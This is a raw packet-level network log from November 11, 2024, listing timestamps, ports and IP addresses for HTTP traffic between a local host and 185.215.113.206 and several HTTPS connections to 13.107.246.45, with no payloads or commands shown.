Nov 11, 2024 10:33:25.746105909 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746118069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746129990 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746140003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746150970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746156931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746172905 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746172905 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746184111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746195078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746205091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746213913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746216059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746228933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746239901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746247053 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746251106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746265888 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746277094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746279955 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746287107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746294975 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.746298075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746300936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746304989 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.746313095 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746329069 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.746335030 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.746336937 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746366024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746433020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746444941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746454954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746465921 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746476889 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746490002 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746529102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746588945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746599913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746611118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746623039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746633053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746634007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746644974 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746655941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746660948 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746668100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746694088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746704102 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746710062 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746717930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746732950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746743917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746747971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746757030 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746766090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746768951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746782064 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746784925 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746793032 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746808052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746820927 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746820927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746841908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746844053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746856928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746860981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746884108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746895075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746896982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746906996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746920109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746928930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746929884 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746943951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746952057 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.746956110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.746984005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747009993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747029066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747040987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747051001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747064114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747090101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747092962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747111082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747114897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747122049 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747133970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747142076 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747144938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747158051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747162104 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747169971 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747181892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747186899 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747194052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747195005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747205019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747215986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747226954 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747230053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747256994 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747258902 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747272015 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747282028 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747297049 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747299910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747318029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747328997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747332096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747339964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747353077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747361898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747364998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747383118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747394085 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747405052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747409105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747417927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747430086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747438908 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747441053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747454882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747462034 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747466087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747478008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747488976 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747488976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747502089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747507095 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747514009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747524977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747536898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747536898 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747549057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747554064 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747564077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.747570992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.747607946 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748333931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748383999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748399973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748410940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748426914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748454094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748469114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748483896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748495102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748506069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748529911 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748543024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748575926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748586893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748596907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748608112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748619080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748631001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748639107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748644114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748647928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748672009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748699903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748727083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748739004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748755932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748763084 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748768091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748778105 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748790979 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748797894 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748810053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748815060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748822927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748842001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748847008 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748858929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748871088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748872995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748886108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748898029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748909950 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748905897 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748922110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748929024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748934984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.748950005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748975992 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.748977900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749002934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749013901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749023914 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749034882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749046087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749053001 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749058962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749067068 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749070883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749082088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749085903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749094963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749106884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749114990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749118090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749140978 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749151945 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749151945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749166012 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749170065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749171972 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749183893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749195099 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749205112 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749206066 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749217987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749231100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749232054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749243021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749250889 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749257088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749269009 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.749274015 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749300003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.749313116 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.760870934 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.760870934 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.760879993 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.760888100 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.762039900 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.762039900 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.762053013 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.762058973 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.763207912 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.763207912 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.763214111 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.763221979 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.763721943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.763991117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.778763056 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.778799057 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.778930902 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.782644033 CET	49850	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.782655954 CET	443	49850	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.787864923 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.787894011 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.787981033 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.787998915 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.788028955 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.788094997 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.788156033 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.788168907 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.789025068 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.789052963 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.789273024 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.789859056 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.789874077 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.790010929 CET	49853	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.790024042 CET	443	49853	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.790812969 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.790826082 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.790955067 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.791115999 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.791126013 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.821036100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821114063 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821168900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821182013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821196079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821213007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821221113 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821223021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821234941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821245909 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821254969 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821259975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821271896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821280956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821281910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821295977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821302891 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821321964 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821350098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821361065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821362019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821374893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821392059 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821403027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821424961 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821450949 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821470976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821489096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821496010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821500063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821512938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821512938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821526051 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821536064 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821553946 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821567059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821578026 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821585894 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821595907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821610928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821611881 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821625948 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821650028 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821655989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821667910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821676970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821677923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821691036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821701050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821707010 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821713924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821738005 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821742058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821754932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821754932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821765900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821777105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821783066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821790934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821790934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821804047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821814060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821815014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821826935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821846008 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821846962 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821860075 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821883917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821894884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821896076 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821913958 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821922064 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821930885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821943045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821947098 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.821954966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.821963072 CET	49747	80	192.168.2.5	185.215.113.206
